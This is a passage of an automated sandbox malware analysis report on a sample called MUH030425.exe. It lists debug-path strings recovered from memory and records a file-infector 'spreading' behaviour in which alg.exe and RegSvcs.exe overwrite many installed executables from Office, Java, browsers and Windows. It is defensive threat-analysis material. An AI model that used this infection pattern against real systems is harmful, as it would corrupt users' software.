              Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: alg.exe, 0000000D.00000003.1637621243.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: alg.exe, 0000000D.00000003.1863510269.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: alg.exe, 0000000D.00000003.1812452407.0000000001450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1806949825.0000000001660000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.8.dr
              Source: Binary string: d:\dbs\el\omr\target\x86\ship\dcf\x-none\Common.ShowHelp.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: Common.ShowHelp.exe.13.dr
              Source: Binary string: Microsoft.VisualBasic.pdb source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: vcruntime140.i386.pdbGCTL source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: pingsender.pdb source: alg.exe, 0000000D.00000003.2182345698.0000000000650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: mscorlib.ni.pdb source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: msvcp140.i386.pdb source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: maintenanceservice.pdb source: alg.exe, 0000000D.00000003.2131240760.0000000000440000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\e\src\out\Release_x64\setup.exe.pdb source: setup.exe1.13.dr
              Source: Binary string: firefox.pdb source: alg.exe, 0000000D.00000003.2112410522.0000000000430000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: alg.exe, 0000000D.00000003.1863510269.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: firefox.pdbP source: alg.exe, 0000000D.00000003.2112410522.0000000000430000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: alg.exe, 0000000D.00000003.1724231457.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: alg.exe, 0000000D.00000003.1742573812.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\b\s\w\ir\cache\builder\src\out\Release_x64\chrome_pwa_launcher.exe.pdb source: alg.exe, 0000000D.00000003.1947973037.0000000001480000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: alg.exe, 0000000D.00000003.1812452407.0000000001450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1806949825.0000000001660000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: System.Windows.Forms.pdb.> source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: mscorlib.ni.pdbRSDS source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: System.Configuration.pdb source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\ssvagent\obj\ssvagent.pdb source: ssvagent.exe.13.dr
              Source: Binary string: minidump-analyzer.pdb source: alg.exe, 0000000D.00000003.2157918575.0000000000650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-multibyte-l1-1-0.dll.8.dr
              Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: msvcp140.i386.pdbGCTL source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: mscorlib.pdb source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: System.Drawing.pdb source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: System.pdb4 source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: alg.exe, 0000000D.00000003.1774099876.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: AppVShNotify.pdbGCTL source: alg.exe, 0000000D.00000003.1859682808.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: alg.exe, 0000000D.00000003.1794989425.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: alg.exe, 0000000D.00000003.1838763806.0000000001650000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1839825345.0000000001650000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1846357220.0000000001530000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: Accessibility.pdb source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: ADelRCP_Exec.pdb source: alg.exe, 0000000D.00000003.1696706041.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: crashreporter.pdb source: alg.exe, 0000000D.00000003.2059367986.0000000000400000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: alg.exe, 0000000D.00000003.1790232245.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: alg.exe, 0000000D.00000003.1724231457.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: System.Xml.ni.pdbRSDS# source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: System.Core.ni.pdb source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: locator.pdb source: Locator.exe.8.dr
              Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ADelRCP_Exec.pdbCC9 source: alg.exe, 0000000D.00000003.1696706041.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: private_browsing.pdb source: alg.exe, 0000000D.00000003.2212108302.0000000000670000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: alg.exe, 0000000D.00000003.1838763806.0000000001650000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1839825345.0000000001650000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1846357220.0000000001530000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: alg.exe, 0000000D.00000003.1637621243.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: alg.exe, 0000000D.00000003.1742573812.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jjs_objs\jjs.pdb source: jjs.exe.13.dr
              Source: Binary string: ucrtbase.pdbUGP source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: mavinject32.pdb source: alg.exe, 0000000D.00000003.1873376292.0000000001650000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1876347240.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: pixuBt.pdb source: MUH030425.exe, WER4A31.tmp.dmp.18.dr
              Source: Binary string: 64BitMAPIBroker.pdb source: alg.exe, 0000000D.00000003.1781474310.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: d:\dbs\el\omr\target\x86\ship\dcf\x-none\Common.ShowHelp.pdb source: Common.ShowHelp.exe.13.dr
              Source: Binary string: System.Drawing.pdb( source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: alg.exe, 0000000D.00000003.1770420067.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: private_browsing.pdbp source: alg.exe, 0000000D.00000003.2212108302.0000000000670000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: alg.exe, 0000000D.00000003.1794989425.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: alg.exe, 0000000D.00000003.1774099876.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: System.Xml.ni.pdb source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: System.ni.pdbRSDS source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: alg.exe, 0000000D.00000003.1790232245.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: maintenanceservice.pdb` source: alg.exe, 0000000D.00000003.2131240760.0000000000440000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: Accessibility.pdbD(L source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: alg.exe, 0000000D.00000003.1747818920.0000000001650000.00000004.00001000.00020000.00000000.sdmp, Eula.exe.13.dr
              Source: Binary string: System.Configuration.ni.pdb source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\ssvagent\obj\ssvagent.pdb<<7 source: ssvagent.exe.13.dr
              Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: System.Xml.pdb source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: System.pdb source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: vcruntime140.i386.pdb source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: System.Windows.Forms.pdb source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: pixuBt.pdbSHA256 source: MUH030425.exe, WER4A31.tmp.dmp.18.dr
              Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: alg.exe, 0000000D.00000003.1602398119.00000000016C0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: locator.pdbGCTL source: Locator.exe.8.dr
              Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: default-browser-agent.pdb source: alg.exe, 0000000D.00000003.2095519854.0000000000400000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: updater.pdb source: alg.exe, 0000000D.00000003.2233883361.0000000000650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: AppVShNotify.pdb source: alg.exe, 0000000D.00000003.1859682808.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: alg.exe, 0000000D.00000003.1747818920.0000000001650000.00000004.00001000.00020000.00000000.sdmp, Eula.exe.13.dr
              Source: Binary string: System.Xml.pdb@\ source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: System.ni.pdb source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: System.Core.ni.pdbRSDS source: WER4A31.tmp.dmp.18.dr

              Spreading

              barindex
              Infects executable files (exe, dll, sys, html)
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSACCESS.EXE
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\pingsender.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\lync.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Windows\System32\vds.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Windows\System32\snmptrap.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Windows\System32\Spectrum.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Program Files\Windows Media Player\wmpnetwk.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Windows\System32\Locator.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Program Files\7-Zip\7z.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\chrmstp.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Windows\System32\AppVClient.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\crashreporter.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSREC.EXE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Windows\SysWOW64\perfhost.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Program Files\7-Zip\7zG.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Windows\System32\msiexec.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\lynchtmlconv.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\setup.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\IEContentService.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Windows\System32\TieringEngineService.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\firefox.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\updater.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe
